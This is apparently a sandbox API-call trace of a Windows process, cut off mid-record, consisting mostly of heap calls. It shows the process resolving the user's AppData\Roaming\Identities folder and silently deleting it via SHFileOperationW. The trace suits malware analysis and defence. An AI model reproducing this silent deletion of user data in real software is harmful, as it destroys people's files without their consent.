[0199.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0199.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0199.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0199.421] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0199.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0199.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0199.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0199.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0199.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0199.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ed0 [0199.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0199.421] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0199.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0199.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0199.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0199.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0199.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0199.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0199.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0199.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0199.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0199.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0199.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0199.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0199.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0199.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0199.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0199.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0199.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0199.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0199.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0199.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0199.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0199.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0199.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0199.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0199.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0199.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0199.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0199.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0199.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0199.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x72) returned 0x24f5278 [0199.424] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Identities", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities", lpFilePart=0x8bf658*="Identities") returned 0x38 [0199.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0199.425] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities")) returned 0x2010 [0199.425] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d72\x5cec\xa1ca\xc84d\x5912\xc2d0\xec77\xb9f2\x7054\xf423\xfb63\xb87d\xa672\xfbfd\xbe3e\x176\xe457\x4a2e\x72b9\x2140\x414\xe0a6\x704\x6193\xc282\x4276\x84f7\x443f\x8365\xe71d\x1acb\x488\xc8a2\x6c4b\xc05c\x9acf\x2753\x3068\x3c6\xda40\x957f\x12f4\x1ff6\xe2d0\x7d85\x7695\xafd3\x1d41\x693b\xee82\x2ae3\x4200\xe79a\xe2ce\xd3f6\xb26b\xaaf7\x4fd5\xe162\xc869\xb82e\x1d44\x682a\x9215\x4834\x9cd5\xd802\xdcbb\xacc3\x9ab2\xe78b\x8d95\x835c\x21e3\x6058\x50b3\x810\x70ae\x35f\xf962\x58c2\x1022\xcc01\xdbb4\x92de\x9184\x7696\x92b3\x7c3e\x9cf6\x6695\xc520\x6d38\x89ea\x85c0\xd69e\x97a\xd6e8\x4d0f\xb53\xef3d\x2ec6\xa308\xa94c\x4fcb\x6797\xc44\x8033\xc11f\x8845\xe71f\xefae\xea30\x301d\xbfc2\xb004\x111a\xbfe3\xd336\x6f96\xc5c1\x59bd\xd3f8\xd102\x44e3\x3a0c\x8db\x780\x8854\x9dc9\xe7c7\x5b0a\x5bb2\x9c8a\x425b\x351f\x2818\x497\xca94\xda0d\x4dd9\xb56c\x1319\x9034\x40e\x6faa\x53f8\xd504\xf1ed\x3ea8\xa408\x151e\xc3c5\x619b\x3716\x120d\x57a2\x8746\xd1df\xb65b\xd0d\x7e5b\x220d\x78c6\x1e1d\x9061\xad6a\xdd1\xc895\xc856\x1fb1\x6791\x4d87\xf917\xffb4\xf977\x408a\x1bd3\x6cbf\x6432\x1eb5\xc626\x23b8\xa052\xc31f\xd7d\x1c98\x6e07\xee8f\xffa\xb60a\x4729\x727a\xd2c3\x61bb\x4e33\xb9ea\x43fb\xdd5b\x171c\x6586\x7940\x2bf4\xb342\xa171\x6a19\x772c\x7ac8\x681a\x6641\x23da\x9198\x66ee\x7e97\xe38f\x1236\x1af7\xc49d\x15dc\xfd8\x4e99\x51fb\x9c58\xcdd2\x2277\x8f0d\x481c\xd330\xd96e\x452c\xb4d2\x3e04\xef3d\x5236\xbe54\xe15b\x8a76\xfa5\x647b\x9f8c\x8259\xeec2\x7660\xb019\x4d9b\xe117\x3cac\x6f89\xc9b8\x7ec7\x9fb\x6e54\xac3d\xc685\x4196\x7e95\xdc63\x9247\xc89e\x2927\xe77c\x3c26\xc93a\xba32\x3485\xee8f\xcc11\x8493\x922\x2e9e\x2504\xfc7c\x24a6\xb04c\xce5\x8cf7\xe168\x399\x17\x6c3a\x117e\x3b8\xa133\x7f14\xdc70\xe147\xe604\xcd3d\xa493\xe5be\xddc7\x741a\xac5\x173f\xc1e9\x210a\x47f9\xcfd6\x2ade\x7645\xc17\x2305\xe20\x72ac\xc0e3\xdc05\xa8a4\xf81e\x1fc4\xca17\x4db8\x689\x132d\x29c2\x783b\x2485\xcc98\xdca8\x4633\x7abb\xb74\xfe60\xba3d\x514b\x6813\x4f0d\x9c10\x26e5\xcd98\x9846\x6fc3\xc5ab\xba1c\x896e\xc7ec\x6998\x31c7\x6e8a\x8ee9\x6498\xb90a\xd4d4\xa662\x5e3d\xb82d\x18fb\x7fc4\xd374\x388e\xcdb5\xc646\x8595\x736f\xda35\x8188\xec8c\xa426\x2c2f\x4cd6\x4bfb\xcf75\x8b59\xc8bc\xf8fe\x9eac\xcda\xfe0e\xd617\x6d96\x7d62\x7973\x807d\x1725\xea47\xedcb\x6fa9\xd62e\x30b2\x5f56\x7c71\xf57d\xfa91\x87ae\x666c\x6183\x565a\x83fc\x18d7\xb5f1\xf6a4\x2b7b\xfb90\x7fd9\x939\x6d44\x522b\x39b7\xa6ea\xbe6a\x485f\x33ed\xec05\x38a6\xe4d8\x4c28\xb015\x7131\x8bb0\xb0a2\x42b\x606c\x2c1c\x3aa9\x33e2\xc208\x3dad\xc04d\x26bb\x3c02\x4851\xedac\xda66\x8dc6\x1b3d\x1928\x9b51\xb50d\xf8e7\x5051\xacac\xe879\xc82a\x7f9\x89c8\x3946\x5dc8\xb98d\x71fb\x6d9\xbc96\xa356\xe1fb\xbe50\x5bac\x5d68\x6ed0\xf3f7\xa45d\xea17\x1aa2\xf473\x651c\xe1ea\xb8dd\xf393\x46d4\x31be\xe5f6\x1eee\x93d7\xbedf\xa3c9\x3cc2\x19aa\xbf8a\x2275\xd2d7\x1b26\xa188\x42b\xf4\xb342\x37ed\xe44c\xff7b\xbd00\x4386\x14ef\x6d0\x7501\xa0c5\x7117\x9e68\x6e80\x5012\xc4b\xe0ea\x11d0\xba02\x4045\xe3ff\x428b\x5ebf\x5083\x809b\x2ebe\xf5a0\xe831\x1c07\xd9fa\x39bf\xfff4\xf404\x18d5\x9eb4\x1b43\xf405\x125\x175d\x6e83\xd0e0\x8bf\x73e8\x7a02\xc5f\x5bfa\x7d0e\x4054\x129f\x9bd0\xd062\xe0a\x2c5d\xcfa0\x6808\xc56\x98ba\xb43\xf405\x171\x1fed\xce83\xd0e6\x231\x54a\x5bf4\x146f\x813a\x743\x6808\x80a5\x17be\x5e83\xa1ce\x6f5d\xe870\x16a\x8ead\x741\x6872\x1bdb\xfa3c\x2f25\x1d17\x8e1e\x644c\x2ed0\xe871\x9166\x10d7\x5779\xf2c4\x517e\xd08e\xdfe7\xaf88\xcef7\x7418\x873f\x12ae\x47d0\x3404\x62f\x877d\xe743\x680a\x80b9\x888e\x5f41\xd0e5\xbd09\xb5ea\xa0c5\x704f\x5ba8\x5740\xe80a\xf967\x71b1\xd0e6\x104\x407d\x1b40\xd063\x393b\xfd94\x438b\x16ef\xbfd0\xa0c4\x1c85\x43ba\xa740\xe80b\x31a3\xf5e8\xfa1c\x809a\